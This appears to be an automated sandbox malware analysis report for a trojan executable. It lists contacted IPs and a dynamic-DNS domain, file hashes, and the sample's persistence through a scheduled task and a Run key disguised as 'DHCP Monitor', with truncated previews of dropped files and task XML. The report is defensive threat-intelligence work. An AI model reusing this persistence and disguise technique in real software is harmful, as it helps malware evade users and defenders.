                      http://www.sajatypeworks.comU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.typography.netDU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.com/designers/cabarga.htmlNU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.founder.com.cn/cn/cTheU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.galapagosdesign.com/staff/dennis.htmU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://fontfabrik.comU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.founder.com.cn/cnU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designers/frere-user.htmlU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.jiyu-kobo.co.jp/U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.galapagosdesign.com/DPleaseU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers8U7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fonts.comU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.sandoll.co.krU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.urwpp.deDPleaseU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.zhongyicts.com.cnU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameU7Ncg7oAyC.exe, 00000000.00000002.306915424.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, U7Ncg7oAyC.exe, 00000013.00000002.384938469.0000000002831000.00000004.00000800.00020000.00000000.sdmp, dhcpmon.exe, 00000016.00000002.410739421.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, dhcpmon.exe, 00000018.00000002.427276046.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.sakkal.comU7Ncg7oAyC.exe, 00000000.00000002.313111190.0000000009482000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                102.89.42.162
                                fastspeed.ddnsfree.comNigeria
                                29465VCG-ASNGfalse
                                185.19.85.160
                                unknownSwitzerland
                                48971DATAWIRE-ASCHtrue
                                Joe Sandbox Version:34.0.0 Boulder Opal
                                Analysis ID:623790
                                Start date and time: 10/05/202220:24:162022-05-10 20:24:16 +02:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 14m 49s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:U7Ncg7oAyC.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:46
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@42/24@4/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:
                                • Successful, ratio: 1.9% (good quality ratio 1.4%)
                                • Quality average: 45.6%
                                • Quality standard deviation: 35.6%
                                HCA Information:
                                • Successful, ratio: 84%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Adjust boot time
                                • Enable AMSI
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                TimeTypeDescription
                                20:25:34API Interceptor683x Sleep call for process: U7Ncg7oAyC.exe modified
                                20:25:47API Interceptor117x Sleep call for process: powershell.exe modified
                                20:25:58Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\Desktop\U7Ncg7oAyC.exe" s>$(Arg0)
                                20:26:00AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                20:26:02Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
                                20:26:11API Interceptor4x Sleep call for process: dhcpmon.exe modified
                                No context
                                No context
                                No context
                                No context
                                No context
                                Process:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):664064
                                Entropy (8bit):7.74828321522851
                                Encrypted:false
                                SSDEEP:12288:QqGhvUmBJRrmxQiRcA6qcDwnwSbKKzXHw1hwtfu4AILNTHtrlHSMOl40s0hAD0iO:pGdPBJRCGinMSmgXeQ33LL9SMOl
                                MD5:1D2CA2D522F8F4E99609CF7E88E673B4
                                SHA1:7754EADE48451776AB6109A0C584573780A4F531
                                SHA-256:26E6FE6C78632392C446E53EB0779EC99E0864D09265B9DDA557763629EF3396
                                SHA-512:427A23DFE919BC0EA067D8641829DD767DF8E68A8639E17583F3E52168E69F6CBE434B6155F807418036CEF81B62FD4F605A7EA648474B3FAA7F5C46C0E6E615
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 63%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xb..............0..............7... ...@....@.. ....................................@..................................7..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................7......H...........t_...........p..pg..........................................2......d.m......0......nx..zm.f...m3 ....3..!..TS......7..(^.XE..d..SM..z.Rl.....\.8,....k..<...)<..:/..vA..U}..Wvf.F..Y.#.....|..H..7..-..;OM..`&..vQ..!k.Jn.l..?A..HUk#....6.J&.w....}...."h.,..A?=.k...k..ej...F.6.X2YT&.8e. W&..x.u.........|;.h......p.]..D.s$~r8).......f..U#..f)...n.-..=..3.... #:M[nK{.........8.[.c!).7Y(Y.+..B...]..o....|>..e....d..-.d..A..:.*..&..j......O.T.9.sQ..7..#{
                                Process:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Reputation:unknown
                                Preview:[ZoneTransfer]....ZoneId=0
                                Process:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):1308
                                Entropy (8bit):5.345811588615766
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                MD5:2E016B886BDB8389D2DD0867BE55F87B
                                SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                Malicious:true
                                Reputation:unknown
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1308
                                Entropy (8bit):5.345811588615766
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                MD5:2E016B886BDB8389D2DD0867BE55F87B
                                SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                Malicious:false
                                Reputation:unknown
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):22088
                                Entropy (8bit):5.603576278487026
                                Encrypted:false
                                SSDEEP:384:/tCDSq0G3IwPko0Rb1RwSBKnkjultIU4ptQCvHg3hIn0ML+2fmAV7l/DvyZQvnIS:sIAkokM4KkCltHQKA66/Kqp0+x
                                MD5:B48A3CB56D940D40899C82CB18349019
                                SHA1:A81F5B80148B290F7B115B1862A6BF492754472B
                                SHA-256:456907D8FEC547A994094963214D6433096460E716734BC3F0565D0017A39CD8
                                SHA-512:3DF1CE0167928C518BC5E7957944FEA3D79021F7B2A672AF5E16AE8622E003D99AD78591471C3FBEFC7121075ABA22948A13B2C91C1DB486FEC1B3AF6129AB07
                                Malicious:false
                                Reputation:unknown
                                Preview:@...e...........K.......{...........n...'.[..........@..........H...............<@.^.L."My...:<..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:unknown
                                Preview:1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:unknown
                                Preview:1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:unknown
                                Preview:1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:unknown
                                Preview:1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:unknown
                                Preview:1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:unknown
                                Preview:1
                                Process:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1597
                                Entropy (8bit):5.144122461061698
                                Encrypted:false
                                SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtanxvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTMv
                                MD5:9EFD51689C727F20C031623471DE2F80
                                SHA1:D482AE77FF2C56200AFF26D1F60F154EA3284424
                                SHA-256:48DB737457328E54039E4D5EAFC9A5138E44BD8517AFE7CCCBCC897DBE14883D
                                SHA-512:6FE4406EB3AEA4BC6526F41679C148EC6FEF5D94CE336480CC697E0FF331C33C3706751B3798B390AAFC764F4D2EAAA487C8C149EDD26A1F05B6D67B3EACC2E7
                                Malicious:true
                                Reputation:unknown
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                Process:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1300
                                Entropy (8bit):5.1120026128474345
                                Encrypted:false
                                SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Yaxtn:cbk4oL600QydbQxIYODOLedq3Wj
                                MD5:2B43925FC06B18EE3393BA0ADD40BAAF
                                SHA1:CAAA2EC5919286948F8261749881EC16F002F7AE
                                SHA-256:BC1F1A6129175A30B5AAB1BBA669B079FC6EEEA63932408B45360D7D17954CAD
                                SHA-512:A219269E021E58E60B8ADDF2944D4704DEB13E6C83DAB93559982673D2DF7279B6DDE6C6EB2528DF5B893144679DD16132B0B366C327A7E7D34EC3163084B8B5
                                Malicious:false
                                Reputation:unknown
                                Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                Process:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):1310
                                Entropy (8bit):5.109425792877704
                                Encrypted:false
                                SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                                MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                                SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                                SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                                SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                                Malicious:false
                                Reputation:unknown
                                Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                Process:C:\Users\user\Desktop\U7Ncg7oAyC.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1597
                                Entropy (8bit):5.144122461061698
                                Encrypted:false
                                SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtanxvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTMv
                                MD5:9EFD51689C727F20C031623471DE2F80
                                SHA1:D482AE77FF2C56200AFF26D1F60F154EA3284424
                                SHA-256:48DB737457328E54039E4D5EAFC9A5138E44BD8517AFE7CCCBCC897DBE14883D
                                SHA-512:6FE4406EB3AEA4BC6526F41679C148EC6FEF5D94CE336480CC697E0FF331C33C3706751B3798B390AAFC764F4D2EAAA487C8C149EDD26A1F05B6D67B3EACC2E7
                                Malicious:false
                                Reputation:unknown
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1597
                                Entropy (8bit):5.144122461061698
                                Encrypted:false
                                SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtanxvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTMv
                                MD5:9EFD51689C727F20C031623471DE2F80
                                SHA1:D482AE77FF2C56200AFF26D1F60F154EA3284424
                                SHA-256:48DB737457328E54039E4D5EAFC9A5138E44BD8517AFE7CCCBCC897DBE14883D
                                SHA-512:6FE4406EB3AEA4BC6526F41679C148EC6FEF5D94CE336480CC697E0FF331C33C3706751B3798B390AAFC764F4D2EAAA487C8C149EDD26A1F05B6D67B3EACC2E7
                                Malicious:false
                                Reputation:unknown
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1597
                                Entropy (8bit):5.144122461061698
                                Encrypted:false
                                SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtanxvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTMv
                                MD5:9EFD51689C727F20C031623471DE2F80
                                SHA1:D482AE77FF2C56200AFF26D1F60F154EA3284424
                                SHA-256:48DB737457328E54039E4D5EAFC9A5138E44BD8517AFE7CCCBCC897DBE14883D
                                SHA-512:6FE4406EB3AEA4BC6526F41679C148EC6FEF5D94CE336480CC697E0FF331C33C3706751B3798B390AAFC764F4D2EAAA487C8C149EDD26A1F05B6D67B3EACC2E7
                                Malicious:false
                                Reputation:unknown
